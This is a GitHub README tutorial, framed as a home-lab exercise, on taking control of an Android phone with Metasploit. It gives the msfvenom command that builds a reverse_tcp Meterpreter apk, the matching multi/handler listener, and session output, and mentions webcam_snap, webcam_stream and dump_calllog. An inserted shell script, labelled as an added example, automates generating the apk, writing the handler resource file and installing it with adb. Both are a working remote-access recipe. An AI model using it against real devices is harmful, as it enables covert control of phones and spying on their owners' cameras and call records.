
basic-android-exploit-metasploit's Introduction

Android exploitation with Metasploit

I'm doing this as an exercise to understand how Metasploit and Android payloads work. Needless to say, if you want to experiment with this, do it with a phone you can reset right after to avoid any kind of issue. Also, prefer doing it in a controlled environment like your home network.

Set-up

  • Attacker: macOS High Sierra with Metasploit
  • Victim: Android phone: Galaxy J2 Pro, Android 7.1.1

Generate apk

First, get your IP address (attacker) using ifconfig:

$ ifconfig en0 | grep 192
	inet 192.168.1.37 netmask 0xffffff00 broadcast 192.168.1.255

Note that here my interface is en0; put yours instead, or leave it blank to list all interfaces. Also, | grep 192 just picks out the line with the IP address, as I know mine starts with 192. You may need to omit that part as well (grep inet works on any interface).

Use msfvenom (part of Metasploit) to generate the "malicious" apk (remember to use your own IP address here). android/meterpreter/reverse_tcp is a staged payload: the apk only contains a small stager, and the handler sends the full Meterpreter (the stage) once the stager connects back, which is why the generated payload is only about 10 KB:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.37 LPORT=4444 R > boom.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10188 bytes

Start listener

Before copying and installing the apk on the phone, a handler that listens for connections (and eventually spawns shells ;)) has to be set up on the attacker machine. The payload set on the handler must be exactly the one msfvenom generated, android/meterpreter/reverse_tcp: a staged apk connecting to a handler configured for the stageless android/meterpreter_reverse_tcp (note the underscore) never gets a session. LHOST and LPORT must match too. This is done from msfconsole:

$ msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.37
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.37:4444

Install/run the app

Copy the apk file to the phone and open it. I must say this looks really sketchy when installing: it has no icon, the app's name is MainActivity (LOL), and it asks for a long list of permissions to be granted; check out the screenshot of the install screen.

Before being able to install it, you'll most likely need to change your settings, as the apk comes from an "unknown source". You'll also have to go through a series of warnings that look bad enough for anybody to understand it's not safe to install/open this file. I guess there are other ways of generating this apk so that it's not so noisy, but this one will be enough for the purpose of these notes.
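The three steps above (generate the apk, start the handler, install the app) as one script. This is an added example, not code from the original README: it keeps the payload name, LHOST and LPORT in one place so msfvenom and the handler cannot drift apart, and writes the handler setup as an msfconsole resource file instead of typing it by hand. The interface name (en0), the file names boom.apk and handler.rc, and the optional adb install over USB debugging are assumptions; msfvenom, msfconsole and adb are only invoked when the script is run with the argument run.

```shell
#!/bin/sh
# Added example, not the original README's code: generate the apk and the
# matching handler from one place. Interface (en0), file names and the optional
# adb step are assumptions.
set -eu

PAYLOAD="android/meterpreter/reverse_tcp"   # staged; the handler must use the same name

# Classify a Metasploit payload name: "meterpreter/reverse_tcp" is staged (the apk
# carries only a stager, the handler sends the stage), "meterpreter_reverse_tcp"
# is stageless. A staged apk talking to a stageless handler (or vice versa)
# never yields a session.
payload_kind() {
  case "$1" in
    */meterpreter/*) echo staged ;;
    */meterpreter_*) echo stageless ;;
    *) echo unknown ;;
  esac
}

# Attacker IP on a given interface: ifconfig on macOS/BSD, `ip` on Linux.
attacker_ip() {
  if command -v ifconfig >/dev/null 2>&1; then
    ifconfig "$1" | awk '$1 == "inet" { print $2; exit }'
  else
    ip -4 -o addr show dev "$1" | awk '{ sub(/\/.*/, "", $4); print $4; exit }'
  fi
}

# msfconsole resource script for the matching handler. "ExitOnSession false"
# plus "exploit -j -z" keeps the listener up as a background job, so a retried
# install or a second device gets its own session instead of killing the handler.
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set payload $PAYLOAD
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j -z
EOF
}

# Only touch the real tools when invoked as: sh android-handler.sh run
if [ "${1:-}" = "run" ]; then
  LHOST="$(attacker_ip "${IFACE:-en0}")"
  LPORT="${LPORT:-4444}"
  APK="${APK:-boom.apk}"
  echo "[*] payload $PAYLOAD ($(payload_kind "$PAYLOAD")), handler $LHOST:$LPORT"
  # Same generation as the README, writing the raw (apk) output with -o.
  msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -o "$APK"
  handler_rc "$LHOST" "$LPORT" > handler.rc
  # Optional: push the apk over USB debugging instead of copying it by hand.
  # adb install does not launch the app; open it on the phone once the handler is up.
  if command -v adb >/dev/null 2>&1; then adb install -r "$APK"; fi
  msfconsole -q -r handler.rc
fi
```

Without the run argument the script only defines the functions, so you can source it and inspect `handler_rc 192.168.1.37 4444` before starting anything.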

Got session!

After launching the app (not without having had to retry the install process), our handler pops a Meterpreter session:

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.37:4444
[*] Sending stage (73742 bytes) to 192.168.1.60
[*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.60:42099) at 2020-06-06 20:50:50 +0200

So we can go ahead and check out the fun stuff now! Enter help to see all the commands available in the Meterpreter session. I verified that some of them worked, like webcam_stream, webcam_snap and dump_calllog 🙈

Conclusions

My first conclusion on this experiment is that Metasploit rocks! It's so easy to generate a payload that provides full control over an Android phone. I can very much imagine this being used as an ad-hoc remote control tool for which you generate the apk dynamically, how cool is that?! It's also open source, so it's great as a learning resource.

From an attacker's point of view, the default apk is quite noisy, but I guess payload generation can be tweaked so that it's less noisy. Note that nothing here exploits a vulnerability in Android itself: the "exploit" is the user enabling installs from unknown sources, clicking through the warnings and granting the permissions, so the defence is the one the phone already shows you.

basic-android-exploit-metasploit's People

Contributors

notsag-dev